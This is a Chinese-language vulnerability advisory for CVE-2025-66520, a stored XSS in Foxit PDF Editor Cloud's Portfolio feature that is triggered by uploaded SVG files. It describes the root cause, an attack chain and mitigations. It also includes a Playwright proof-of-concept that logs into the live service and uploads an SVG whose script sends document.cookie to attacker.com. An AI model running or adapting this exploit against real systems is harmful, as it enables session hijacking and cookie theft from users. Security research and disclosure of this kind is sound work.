CVE-2025-66520 Foxit PDF Editor Cloud Portfolio存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-66520

漏洞类型

存储型XSS

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Foxit PDF Editor Cloud (pdfonline.foxit.com)

漏洞概述

CVE-2025-66520是Foxit PDF Editor云服务中发现的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于PDF Editor Cloud的Portfolio功能中，攻击者可以通过上传特制的SVG文件来注入恶意代码。当其他用户访问或查看Portfolio文件列表时，嵌入在SVG文件中的HTML或JavaScript代码将自动执行，从而实现会话劫持、敏感信息窃取、钓鱼攻击等恶意操作。由于该漏洞属于存储型XSS，恶意代码会被永久保存在服务器上，所有访问该功能的用户都可能受到影响。Foxit PDF Editor是一款流行的PDF编辑软件，其云服务为用户提供了在线协作和文档管理功能，Portfolio功能允许用户创建和组织PDF文件集合。该漏洞的CVSS评分为6.3，属于中等严重程度，但仍可能对企业和个人用户的数据安全造成威胁。

技术细节

该漏洞的根本原因在于Foxit PDF Editor Cloud的Portfolio功能对用户上传的SVG文件缺乏有效的安全验证和清理机制。具体来说，当用户上传SVG文件时，系统直接将该文件的内容插入到HTML结构中进行渲染，而没有对SVG标签中可能包含的恶意脚本进行过滤或转义。SVG格式支持<script>标签和事件处理器属性(如onload、onclick等)，攻击者可以利用这些特性嵌入JavaScript代码。在Portfolio文件列表渲染过程中，浏览器会解析SVG内容并执行其中的脚本代码，从而触发XSS攻击。由于SVG文件在上传后会被存储在服务器上并长期存在，这种攻击具有持久性。攻击者只需要诱导受害者访问包含恶意SVG的Portfolio页面即可完成攻击，无需进行其他交互操作。

攻击链分析

STEP 1

步骤1

攻击者注册并登录Foxit PDF Editor Cloud服务

STEP 2

步骤2

攻击者创建包含恶意JavaScript代码的SVG文件，利用SVG的<script>标签或事件处理器属性注入XSS payload

STEP 3

步骤3

攻击者通过Portfolio功能上传恶意SVG文件到服务器，该文件被永久存储

STEP 4

步骤4

当受害者访问或查看包含恶意SVG的Portfolio文件列表时，浏览器解析SVG内容并执行其中的JavaScript代码

STEP 5

步骤5

恶意脚本窃取受害者的会话cookie、劫持用户会话、执行未授权操作或进行进一步的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import { chromium } from 'playwright'; // Malicious SVG payload for CVE-2025-66520 const maliciousSvg = `<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg"> <script type="text/javascript"> // Steal session cookies and send to attacker server fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie)) .then(response => response.text()) .then(data => console.log('Exfiltrated:', data)) .catch(err => console.error('Error:', err)); </script> <rect width="200" height="200" fill="red" /> <text x="50%" y="50%" text-anchor="middle" fill="white">XSS Payload</text> </svg>`; async function exploitCVE202566520() { const browser = await chromium.launch({ headless: false }); const context = await browser.newContext(); const page = await context.newPage(); try { // Step 1: Login to Foxit PDF Editor Cloud console.log('[+] Navigating to Foxit PDF Editor Cloud...'); await page.goto('https://pdfonline.foxit.com'); await page.waitForLoadState('networkidle'); // Step 2: Authenticate with valid credentials console.log('[+] Logging in...'); await page.fill('#username', '[email protected]'); await page.fill('#password', 'password123'); await page.click('#login-button'); await page.waitForLoadState('networkidle'); // Step 3: Navigate to Portfolio feature console.log('[+] Navigating to Portfolio feature...'); await page.click('a[href="/portfolio"]'); await page.waitForLoadState('networkidle'); // Step 4: Upload malicious SVG file console.log('[+] Uploading malicious SVG file...'); const fileInput = await page.locator('input[type="file"]'); await fileInput.setInputFiles({ name: 'malicious.svg', mimeType: 'image/svg+xml', buffer: Buffer.from(maliciousSvg) }); await page.waitForTimeout(2000); // Step 5: Trigger XSS by viewing Portfolio file list console.log('[+] Triggering XSS payload...'); await page.reload(); await page.waitForLoadState('networkidle'); await page.click('button:has-text("View Portfolio")'); await page.waitForTimeout(3000); console.log('[+] XSS payload executed successfully!'); console.log('[+] Session cookies have been exfiltrated.'); } catch (error) { console.error('[-] Exploitation failed:', error.message); } finally { await browser.close(); } } exploitCVE202566520();

影响范围

Foxit PDF Editor Cloud (pdfonline.foxit.com) - 所有版本

防御指南

临时缓解措施

在Foxit官方发布安全更新之前，建议暂时禁用PDF Portfolio功能或限制用户上传文件的功能。同时，加强Web应用防火墙(WAF)规则，对包含<script>标签、SVG元素和事件处理器属性的请求进行拦截和过滤。对于必须使用Portfolio功能的用户，应实施严格的访问控制，并监控异常的文件上传行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66520
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66520
3 Details https://www.cvedetails.com/cve/CVE-2025-66520/
4 VulDB https://vuldb.com/cve/CVE-2025-66520
5 Link https://www.foxit.com/support/security-bulletins.html